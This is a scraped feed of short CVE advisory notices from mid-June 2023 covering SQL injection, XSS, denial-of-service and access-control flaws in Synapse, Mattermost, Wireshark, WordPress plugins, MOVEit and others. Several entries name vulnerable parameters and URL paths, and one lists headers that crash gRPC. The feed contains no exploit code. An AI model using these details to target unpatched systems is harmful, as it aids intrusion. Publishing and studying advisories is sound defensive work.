🚨 CVE-2023-32682Synapse is a Matrix protocol homeserver written in Python with the Twisted framework. In affected versions it may be possible for a deactivated user to login when using uncommon configurations. This only applies if any of the following are true: 1. JSON Web Tokens are enabled for login via the `jwt_config.enabled` configuration setting. 2. The local password database is enabled via the `password_config.enabled` and `password_config.localdb_enabled` configuration settings *and* a user's password is updated via an admin API after a user is deactivated. Note that the local password database is enabled by default, but it is uncommon to set a user's password after they've been deactivated. Installations that are configured to only allow login via Single Sign-On (SSO) via CAS, SAML or OpenID Connect (OIDC); or via an external password provider (e.g. LDAP) are not affected. If not using JSON Web Tokens, ensure that deactivated users do not have a password set. This issue has been addressed in version 1.85.0. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-06-17 05:58:43 |
🚨 CVE-2023-32683Synapse is a Matrix protocol homeserver written in Python with the Twisted framework. A discovered oEmbed or image URL can bypass the `url_preview_url_blacklist` setting potentially allowing server side request forgery or bypassing network policies. Impact is limited to IP addresses allowed by the `url_preview_ip_range_blacklist` setting (by default this only allows public IPs) and by the limited information returned to the client: 1. For discovered oEmbed URLs, any non-JSON response or a JSON response which includes non-oEmbed information is discarded. 2. For discovered image URLs, any non-image response is discarded. Systems which have URL preview disabled (via the `url_preview_enabled` setting) or have not configured a `url_preview_url_blacklist` are not affected. This issue has been addressed in version 1.85.0. Users are advised to upgrade. User unable to upgrade may also disable URL previews.🎖@cveNotify |
|
| 2023-06-17 05:58:41 |
🚨 CVE-2023-33817hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability.🎖@cveNotify |
|
| 2023-06-17 05:58:40 |
🚨 CVE-2023-3189A vulnerability, which was classified as problematic, was found in SourceCodester Online School Fees System 1.0. This affects an unknown part of the file /paysystem/branch.php of the component POST Parameter Handler. The manipulation of the argument branch leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231501 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-17 05:58:38 |
🚨 CVE-2023-3227Insufficient Granularity of Access Control in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-17 05:58:37 |
🚨 CVE-2023-3228Business Logic Errors in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-17 05:58:35 |
🚨 CVE-2023-3230Missing Authorization in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-17 05:58:34 |
🚨 CVE-2023-34750bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=projects&action=edit.🎖@cveNotify |
|
| 2023-06-17 05:58:33 |
🚨 CVE-2023-34754bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the pid parameter at admin/index.php?mode=settings&page=plugins&action=edit.🎖@cveNotify |
|
| 2023-06-17 05:58:31 |
🚨 CVE-2023-34751bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.🎖@cveNotify |
|
| 2023-06-17 05:58:30 |
🚨 CVE-2023-34752bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.🎖@cveNotify |
|
| 2023-06-17 05:58:29 |
🚨 CVE-2023-34753bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.🎖@cveNotify |
|
| 2023-06-17 05:58:27 |
🚨 CVE-2023-34755bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit.🎖@cveNotify |
|
| 2023-06-17 05:58:26 |
🚨 CVE-2023-34756bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.🎖@cveNotify |
|
| 2023-06-17 05:58:25 |
🚨 CVE-2023-28287Microsoft Publisher Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-17 05:58:23 |
🚨 CVE-2023-28295Microsoft Publisher Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-17 05:58:22 |
🚨 CVE-2023-3295The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) for WordPress is vulnerable to arbitrary file uploads due to missing file type validation of files in the file manager functionality in versions up to, and including, 1.5.66 . This makes it possible for authenticated attackers, with contributor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The issue was partially patched in version 1.5.66 and fully patched in 1.5.67🎖@cveNotify |
|
| 2023-06-17 01:58:11 |
🚨 CVE-2023-34459OpenZeppelin Contracts is a library for smart contract development. Starting in version 4.7.0 and prior to version 4.9.2, when the `verifyMultiProof`, `verifyMultiProofCalldata`, `procesprocessMultiProof`, or `processMultiProofCalldat` functions are in use, it is possible to construct merkle trees that allow forging a valid multiproof for an arbitrary set of leaves.A contract may be vulnerable if it uses multiproofs for verification and the merkle tree that is processed includes a node with value 0 at depth 1 (just under the root). This could happen inadvertedly for balanced trees with 3 leaves or less, if the leaves are not hashed. This could happen deliberately if a malicious tree builder includes such a node in the tree.A contract is not vulnerable if it uses single-leaf proving (`verify`, `verifyCalldata`, `processProof`, or `processProofCalldata`), or if it uses multiproofs with a known tree that has hashed leaves. Standard merkle trees produced or validated with the @openzeppelin/merkle-tree library are safe.The problem has been patched in version 4.9.2.Some workarounds are available. For those using multiproofs: When constructing merkle trees hash the leaves and do not insert empty nodes in your trees. Using the @openzeppelin/merkle-tree package eliminates this issue. Do not accept user-provided merkle roots without reconstructing at least the first level of the tree. Verify the merkle tree structure by reconstructing it from the leaves.🎖@cveNotify |
|
| 2023-06-16 22:58:30 |
🚨 CVE-2023-30903HP-UX could be exploited locally to create a Denial of Service (DoS) when any physical interface is configured with IPv6/inet6. 🎖@cveNotify |
|
| 2023-06-16 22:58:29 |
🚨 CVE-2023-30904A security vulnerability in HPE Insight Remote Support may result in the local disclosure of privileged LDAP information.🎖@cveNotify |
|
| 2023-06-16 22:58:28 |
🚨 CVE-2023-30905The MC990 X and UV300 RMC component has and inadequate default configuration that could be exploited to obtain enhanced privilege.🎖@cveNotify |
|
| 2023-06-16 22:58:27 |
🚨 CVE-2023-33438A stored Cross-site scripting (XSS) vulnerability in Wolters Kluwer TeamMate+ 35.0.11.0 allows remote attackers to inject arbitrary web script or HTML.🎖@cveNotify |
|
| 2023-06-16 22:58:23 |
🚨 CVE-2023-35788An issue was discovered in fl_set_geneve_opt in net/sched/cls_flower.c in the Linux kernel before 6.3.7. It allows an out-of-bounds write in the flower classifier code via TCA_FLOWER_KEY_ENC_OPTS_GENEVE packets. This may result in denial of service or privilege escalation.🎖@cveNotify |
|
| 2023-06-16 22:58:22 |
🚨 CVE-2023-35789An issue was discovered in the C AMQP client library (aka rabbitmq-c) through 0.13.0 for RabbitMQ. Credentials can only be entered on the command line (e.g., for amqp-publish or amqp-consume) and are thus visible to local attackers by listing a process and its arguments.🎖@cveNotify |
|
| 2023-06-16 22:58:21 |
🚨 CVE-2023-35708In Progress MOVEit Transfer before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. These are fixed versions of the DLL drop-in: 2020.1.10 (12.1.10), 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3).🎖@cveNotify |
|
| 2023-06-16 22:58:20 |
🚨 CVE-2023-2820An information disclosure vulnerability in the faye endpoint in Proofpoint Threat Response / Threat Response Auto-Pull (PTR/TRAP) could be used by an attacker on an adjacent network to obtain credentials to integrated services via a man-in-the-middle position or cryptanalysis of the session traffic. An attacker could use these credentials to impersonate PTR/TRAP to these services. All versions prior to 5.10.0 are affected. 🎖@cveNotify |
|
| 2023-06-16 22:58:16 |
🚨 CVE-2023-25187An issue was discovered on NOKIA Airscale ASIKA Single RAN devices before 21B. Nokia Single RAN commissioning procedures do not change (factory-time installed) default SSH public/private key values that are specific to a network operator. As a result, the CSP internal BTS network SSH server (disabled by default) continues to apply the default SSH public/private key values. These keys don't give access to BTS, because service user authentication is username/password-based on top of SSH. Nokia factory installed default SSH keys are meant to be changed from operator-specific values during the BTS deployment commissioning phase. However, before the 21B release, BTS commissioning manuals did not provide instructions to change default SSH keys (to BTS operator-specific values). This leads to a possibility for malicious operations staff (inside a CSP network) to attempt MITM exploitation of BTS service user access, during the moments that SSH is enabled for Nokia service personnel to perform troubleshooting activities.🎖@cveNotify |
|
| 2023-06-16 22:58:15 |
🚨 CVE-2023-34474A heap-based buffer overflow issue was discovered in ImageMagick's ReadTIM2ImageData() function in coders/tim2.c. A local attacker could trick the user in opening specially crafted file, triggering an out-of-bounds read error, allowing an application to crash, resulting in a denial of service.🎖@cveNotify |
|
| 2023-06-16 22:58:14 |
🚨 CVE-2023-34475A heap use after free issue was discovered in ImageMagick's ReplaceXmpValue() function in MagickCore/profile.c. An attacker could trick user to open a specially crafted file to convert, triggering an heap-use-after-free write error, allowing an application to crash, resulting in a denial of service.🎖@cveNotify |
|
| 2023-06-16 22:58:13 |
🚨 CVE-2023-35784A double free or use after free could occur after SSL_clear in OpenBSD 7.2 before errata 026 and 7.3 before errata 004, and in LibreSSL before 3.6.3 and 3.7.x before 3.7.3. NOTE: OpenSSL is not affected.🎖@cveNotify |
|
| 2023-06-16 22:58:12 |
🚨 CVE-2023-3195A stack-based buffer overflow issue was found in ImageMagick's coders/tiff.c. This flaw allows an attacker to trick the user into opening a specially crafted malicious tiff file, causing an application to crash, resulting in a denial of service.🎖@cveNotify |
|
| 2023-06-16 20:58:29 |
🚨 CVE-2023-25188An issue was discovered on NOKIA Airscale ASIKA Single RAN devices before 21B. If/when CSP (as a BTS administrator) removes security hardenings from the Nokia Single RAN BTS baseband unit, the BTS baseband unit diagnostic tool AaShell (which is by default disabled) allows unauthenticated access from the mobile network solution internal BTS management network to the BTS embedded Linux operating-system level.🎖@cveNotify |
|
| 2023-06-16 20:58:28 |
🚨 CVE-2023-3268An out of bounds (OOB) memory access flaw was found in the Linux kernel in relay_file_read_start_pos in kernel/relay.c in the relayfs. This flaw could allow a local attacker to crash the system or leak kernel internal information.🎖@cveNotify |
|
| 2023-06-16 20:58:24 |
🚨 CVE-2023-2986The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, which users are typically customers.🎖@cveNotify |
|
| 2023-06-16 20:58:23 |
🚨 CVE-2023-2718The Contact Form Email WordPress plugin before 1.3.38 does not escape submitted values before displaying them in the HTML, leading to a Stored XSS vulnerability.🎖@cveNotify |
|
| 2023-06-16 20:58:19 |
🚨 CVE-2022-39946An access control vulnerability [CWE-284] in FortiNAC version 9.4.2 and below, version 9.2.7 and below, 9.1 all versions, 8.8 all versions, 8.7 all versions, 8.6 all versions, 8.5 all versions may allow a remote attacker authenticated on the administrative interface to perform unauthorized jsp calls via crafted HTTP requests.🎖@cveNotify |
|
| 2023-06-16 20:58:18 |
🚨 CVE-2023-35054In JetBrains YouTrack before 2023.1.10518 stored XSS in a Markdown-rendering engine was possible🎖@cveNotify |
|
| 2023-06-16 20:58:14 |
🚨 CVE-2023-1323The Easy Forms for Mailchimp WordPress plugin before 6.8.9 does not sanitise and escape some of its from parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-06-16 20:58:13 |
🚨 CVE-2023-34645jfinal CMS 5.1.0 has an arbitrary file read vulnerability.🎖@cveNotify |
|
| 2023-06-16 20:58:12 |
🚨 CVE-2023-34659jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.🎖@cveNotify |
|
| 2023-06-16 16:58:37 |
🚨 CVE-2023-35782The ipandlanguageredirect extension before 5.1.2 for TYPO3 allows SQL Injection.🎖@cveNotify |
|
| 2023-06-16 16:58:36 |
🚨 CVE-2023-35783The ke_search (aka Faceted Search) extension before 4.0.3, 4.1.x through 4.6.x before 4.6.6, and 5.x before 5.0.2 for TYPO3 allows XSS via indexed data.🎖@cveNotify |
|
| 2023-06-16 16:58:35 |
🚨 CVE-2023-28709The fix for CVE-2023-24998 was incomplete for Apache Tomcat 11.0.0-M2 to 11.0.0-M4, 10.1.5 to 10.1.7, 9.0.71 to 9.0.73 and 8.5.85 to 8.5.87. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.🎖@cveNotify |
|
| 2023-06-16 16:58:34 |
🚨 CVE-2023-32305aiven-extras is a PostgreSQL extension. Versions prior to 1.1.9 contain a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages missing schema qualifiers on privileged functions called by the aiven-extras extension. A low privileged user can create objects that collide with existing function names, which will then be executed instead. Exploiting this vulnerability could allow a low privileged user to acquire `superuser` privileges, which would allow full, unrestricted access to all data and database functions. And could lead to arbitrary code execution or data access on the underlying host as the `postgres` user. The issue has been patched as of version 1.1.9.🎖@cveNotify |
|
| 2023-06-16 16:58:30 |
🚨 CVE-2023-30086Buffer Overflow vulnerability found in Libtiff V.4.0.7 allows a local attacker to cause a denial of service via the tiffcp function in tiffcp.c.🎖@cveNotify |
|
| 2023-06-16 16:58:29 |
🚨 CVE-2022-40540Memory corruption due to buffer copy without checking the size of input while loading firmware in Linux Kernel.🎖@cveNotify |
|
| 2023-06-16 16:58:28 |
🚨 CVE-2023-2062Missing Password Field Masking vulnerability in Mitsubishi Electric Corporation EtherNet/IP configuration tools SW1DNN-EIPCT-BD and SW1DNN-EIPCTFX5-BD allows a remote unauthenticated attacker to know the password for MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP. This vulnerability results in authentication bypass vulnerability, which allows the attacker to access MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP via FTP.🎖@cveNotify |
|
| 2023-06-16 16:58:24 |
🚨 CVE-2023-2061Use of Hard-coded Password vulnerability in FTP function on Mitsubishi Electric Corporation MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP allows a remote unauthenticated attacker to obtain a hard-coded password and access to the module via FTP.🎖@cveNotify |
|
| 2023-06-16 16:58:23 |
🚨 CVE-2023-2063Unrestricted Upload of File with Dangerous Type vulnerability in FTP function on Mitsubishi Electric Corporation MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP allows a remote unauthenticated attacker to cause information disclosure, tampering, deletion or destruction via file upload/download. As a result, the attacker may be able to exploit this for further attacks.🎖@cveNotify |
|
| 2023-06-16 16:58:22 |
🚨 CVE-2023-34094ChuanhuChatGPT is a graphical user interface for ChatGPT and many large language models. A vulnerability in versions 20230526 and prior allows unauthorized access to the config.json file of the privately deployed ChuanghuChatGPT project, when authentication is not configured. The attacker can exploit this vulnerability to steal the API keys in the configuration file. The vulnerability has been fixed in commit bfac445. As a workaround, setting up access authentication can help mitigate the vulnerability.🎖@cveNotify |
|
| 2023-06-16 16:58:19 |
🚨 CVE-2023-33847IBM TXSeries for Multiplatforms 8.1, 8.2, 9.1, CICS TX Standard, 11.1, CICS TX Advanced 10.1, and 11.1 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 257102.🎖@cveNotify |
|
| 2023-06-16 16:58:18 |
🚨 CVE-2023-2249The wpForo Forum plugin for WordPress is vulnerable to Local File Include, Server-Side Request Forgery, and PHAR Deserialization in versions up to, and including, 2.1.7. This is due to the insecure use of file_get_contents without appropriate verification of the data being supplied to the function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to retrieve the contents of files like wp-config.php hosted on the system, perform a deserialization attack and possibly achieve remote code execution, and make requests to internal services.🎖@cveNotify |
|
| 2023-06-16 16:58:17 |
🚨 CVE-2023-29402The go command may generate unexpected code at build time when using cgo. This may result in unexpected behavior when running a go program which uses cgo. This may occur when running an untrusted module which contains directories with newline characters in their names. Modules which are retrieved using the go command, i.e. via "go get", are not affected (modules retrieved using GOPATH-mode, i.e. GO111MODULE=off, may be affected).🎖@cveNotify |
|
| 2023-06-16 15:58:19 |
🚨 CVE-2023-3294Cross-site Scripting (XSS) - DOM in GitHub repository saleor/react-storefront prior to c29aab226f07ca980cc19787dcef101e11b83ef7.🎖@cveNotify |
|
| 2023-06-16 15:58:18 |
🚨 CVE-2023-2792Mattermost fails to sanitize ephemeral error messages, allowing an attacker to obtain arbitrary message contents by a specially crafted /groupmsg command.🎖@cveNotify |
|
| 2023-06-16 15:58:14 |
🚨 CVE-2023-2793Mattermost fails to validate links on external websites when constructing a preview for a linked website, allowing an attacker to cause a denial-of-service by a linking to a specially crafted webpage in a message.🎖@cveNotify |
|
| 2023-06-16 15:58:13 |
🚨 CVE-2023-2831Mattermost fails to unescape Markdown strings in a memory-efficient way, allowing an attacker to cause a Denial of Service by sending a message containing a large number of escaped characters.🎖@cveNotify |
|
| 2023-06-16 15:58:12 |
🚨 CVE-2023-33307A null pointer dereference in Fortinet FortiOS before 7.2.5 and before 7.0.11, FortiProxy before 7.2.3 and before 7.0.9 allows attacker to denial of sslvpn service via specifically crafted request in network parameter.🎖@cveNotify |
|
| 2023-06-16 13:58:21 |
🚨 CVE-2023-3293Cross-site Scripting (XSS) - Stored in GitHub repository salesagility/suitecrm-core prior to 8.3.0.🎖@cveNotify |
|
| 2023-06-16 13:58:19 |
🚨 CVE-2023-2785Mattermost fails to properly truncate the postgres error log message of a search query failure allowing an attacker to cause the creation of large log files🎖@cveNotify |
|
| 2023-06-16 13:58:18 |
🚨 CVE-2023-2792Mattermost fails to sanitize ephemeral error messages, allowing an attacker to obtain arbitrary message contents by a specially crafted /groupmsg command.🎖@cveNotify |
|
| 2023-06-16 13:58:17 |
🚨 CVE-2023-2793Mattermost fails to validate links on external websites when constructing a preview for a linked website, allowing an attacker to cause a denial-of-service by a linking to a specially crafted webpage in a message.🎖@cveNotify |
|
| 2023-06-16 13:58:16 |
🚨 CVE-2023-2797Mattermost fails to sanitize code permalinks, allowing an attacker to preview code from private repositories by posting a specially crafted permalink on a channel.🎖@cveNotify |
|
| 2023-06-16 13:58:15 |
🚨 CVE-2023-2831Mattermost fails to unescape Markdown strings in a memory-efficient way, allowing an attacker to cause a Denial of Service by sending a message containing a large number of escaped characters.🎖@cveNotify |
|
| 2023-06-16 13:58:14 |
🚨 CVE-2023-33306A null pointer dereference in Fortinet FortiOS before 7.2.5, before 7.0.11 and before 6.4.13, FortiProxy before 7.2.4 and before 7.0.10 allows attacker to denial of sslvpn service via specifically crafted request in bookmark parameter.🎖@cveNotify |
|
| 2023-06-16 13:58:13 |
🚨 CVE-2023-33307A null pointer dereference in Fortinet FortiOS before 7.2.5 and before 7.0.11, FortiProxy before 7.2.3 and before 7.0.9 allows attacker to denial of sslvpn service via specifically crafted request in network parameter.🎖@cveNotify |
|
| 2023-06-16 10:58:25 |
🚨 CVE-2023-2783Mattermost Apps Framework fails to verify that a secret provided in the incoming webhook request allowing an attacker to modify the contents of the post sent by the Apps.🎖@cveNotify |
|
| 2023-06-16 10:58:23 |
🚨 CVE-2023-2784Mattermost fails to verify if the requestor is a sysadmin or not, before allowing `install` requests to the Apps allowing a regular user send install requests to the Apps. 🎖@cveNotify |
|
| 2023-06-16 10:58:22 |
🚨 CVE-2023-2786Mattermost fails to properly check the permissions when executing commands allowing a member with no permissions to post a message in a channel to actually post it by executing channel commands.🎖@cveNotify |
|
| 2023-06-16 10:58:21 |
🚨 CVE-2023-2787Mattermost fails to check channel membership when accessing message threads, allowing an attacker to access arbitrary posts by using the message threads API.🎖@cveNotify |
|
| 2023-06-16 10:58:20 |
🚨 CVE-2023-2788Mattermost fails to check if an admin user account active after an oauth2 flow is started, allowing an attacker with admin privileges to retain persistent access to Mattermost by obtaining an oauth2 access token while the attacker's account is deactivated.🎖@cveNotify |
|
| 2023-06-16 10:58:18 |
🚨 CVE-2023-2791When creating a playbook run via the /dialog API, Mattermost fails to validate all parameters, allowing an authenticated attacker to edit an arbitrary channel post.🎖@cveNotify |
|
| 2023-06-16 10:58:17 |
🚨 CVE-2023-2431A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This bug affects Kubelet.🎖@cveNotify |
|
| 2023-06-16 10:58:16 |
🚨 CVE-2023-34154Vulnerability of undefined permissions in HUAWEI VR screen projection.Successful exploitation of this vulnerability will cause third-party apps to create windows in an arbitrary way, consuming system resources.🎖@cveNotify |
|
| 2023-06-16 10:58:15 |
🚨 CVE-2023-34157Vulnerability of HwWatchHealth being hijacked.Successful exploitation of this vulnerability may cause repeated pop-up windows of the app.🎖@cveNotify |
|
| 2023-06-16 10:58:13 |
🚨 CVE-2023-34165Unauthorized access vulnerability in the Save for later feature provided by AI Touch.Successful exploitation of this vulnerability may cause third-party apps to forge a URI for unauthorized access with zero permissions.🎖@cveNotify |
|
| 2023-06-16 05:58:34 |
🚨 CVE-2022-46165Syncthing is an open source, continuous file synchronization program. In versions prior to 1.23.5 a compromised instance with shared folders could sync malicious files which contain arbitrary HTML and JavaScript in the name. If the owner of another device looks over the shared folder settings and moves the mouse over the latest sync, a script could be executed to change settings for shared folders or add devices automatically. Additionally adding a new device with a malicious name could embed HTML or JavaScript inside parts of the page. As a result the webUI may be subject to a stored cross site scripting attack. This issue has been addressed in version 1.23.5. Users are advised to upgrade. Users unable to upgrade should avoid sharing folders with untrusted users.🎖@cveNotify |
|
| 2023-06-16 05:58:33 |
🚨 CVE-2023-33461iniparser v4.1 is vulnerable to NULL Pointer Dereference in function iniparser_getlongint which misses check NULL for function iniparser_getstring's return.🎖@cveNotify |
|
| 2023-06-16 05:58:32 |
🚨 CVE-2023-2952XRA dissector infinite loop in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:31 |
🚨 CVE-2023-2855Candump log parser crash in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:28 |
🚨 CVE-2023-2856VMS TCPIPtrace file parser crash in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:27 |
🚨 CVE-2023-2854BLF file parser crash in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:26 |
🚨 CVE-2023-2857BLF file parser crash in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:25 |
🚨 CVE-2023-2858NetScaler file parser crash in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:21 |
🚨 CVE-2023-1994GQUIC dissector crash in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:20 |
🚨 CVE-2023-1992RPCoRDMA dissector crash in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:19 |
🚨 CVE-2023-1161ISO 15765 and ISO 10681 dissector crash in Wireshark 4.0.0 to 4.0.3 and 3.6.0 to 3.6.11 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-06-16 05:58:18 |
🚨 CVE-2023-24329An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.🎖@cveNotify |
|
| 2023-06-16 05:58:14 |
🚨 CVE-2022-47015MariaDB Server before 10.3.34 thru 10.9.3 is vulnerable to Denial of Service. It is possible for function spider_db_mbase::print_warnings to dereference a null pointer.🎖@cveNotify |
|
| 2023-06-16 05:58:13 |
🚨 CVE-2023-34581Sourcecodester Service Provider Management System v1.0 is vulnerable to SQL Injection via the ID parameter in /php-spms/?page=services/view&id=2🎖@cveNotify |
|
| 2023-06-16 00:58:50 |
🚨 CVE-2023-32731When gRPC HTTP2 stack raised a header size exceeded error, it skipped parsing the rest of the HPACK frame. This caused any HPACK table mutations to also be skipped, resulting in a desynchronization of HPACK tables between sender and receiver. If leveraged, say, between a proxy and a backend, this could lead to requests from the proxy being interpreted as containing headers from different proxy clients - leading to an information leak that can be used for privilege escalation or data exfiltration. We recommend upgrading beyond the commit contained in https://github.com/grpc/grpc/pull/33005 https://github.com/grpc/grpc/pull/33005 🎖@cveNotify |
|
| 2023-06-16 00:58:49 |
🚨 CVE-2023-1428There exists an vulnerability causing an abort() to be called in gRPC. The following headers cause gRPC's C++ implementation to abort() when called via http2:te: x (x != trailers):scheme: x (x != http, https)grpclb_client_stats: x (x == anything)On top of sending one of those headers, a later header must be sent that gets the total header size past 8KB. We recommend upgrading past git commit 2485fa94bd8a723e5c977d55a3ce10b301b437f8 or v1.53 and above.🎖@cveNotify |
|
| 2023-06-16 00:58:48 |
🚨 CVE-2023-3177A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin\inquiries\view_inquiry.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231151.🎖@cveNotify |
|
| 2023-06-16 00:58:47 |
🚨 CVE-2023-2897The Brizy Page Builder plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.4.18. This is due to an implicit trust of user-supplied IP addresses in an 'X-Forwarded-For' HTTP header for the purpose of validating allowed IP addresses against a Maintenance Mode whitelist. Supplying a whitelisted IP address within the 'X-Forwarded-For' header allows maintenance mode to be bypassed and may result in the disclosure of potentially sensitive information or allow access to restricted functionality.🎖@cveNotify |
|
| 2023-06-16 00:58:46 |
🚨 CVE-2023-2764The Draw Attention plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_set_featured_image function in versions up to, and including, 2.0.11. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change the featured image of arbitrary posts with an image that exists in the media library.🎖@cveNotify |
|
| 2023-06-16 00:58:45 |
🚨 CVE-2023-2767The WordPress File Upload and WordPress File Upload Pro plugins for WordPress are vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 4.19.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-06-16 00:58:43 |
🚨 CVE-2023-3176A vulnerability, which was classified as critical, was found in SourceCodester Lost and Found Information System 1.0. Affected is an unknown function of the file admin\user\manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-231150 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-16 00:58:42 |
🚨 CVE-2023-23841SolarWinds Serv-U is submitting an HTTP request when changing or updating the attributes for File Share or File request.? Part of the URL of the request discloses sensitive data.🎖@cveNotify |
|
| 2023-06-16 00:58:41 |
🚨 CVE-2023-28810Some access control/intercom products have unauthorized modification of device network configuration vulnerabilities. Attackers can modify device network configuration by sending specific data packets to the vulnerable interface within the same local network.🎖@cveNotify |
|
| 2023-06-16 00:58:40 |
🚨 CVE-2023-2604The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘search_term’ parameter in versions up to, and including, 1.0.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-16 00:58:39 |
🚨 CVE-2023-2599The Active Directory Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 4.1.4 due to missing nonce verification on the get_users function and insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to cause resource exhaustion via a forged request granted they can trick an administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-16 00:58:37 |
🚨 CVE-2023-2607The Multiple Page Generator Plugin for WordPress is vulnerable to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 3.3.17 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrator privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
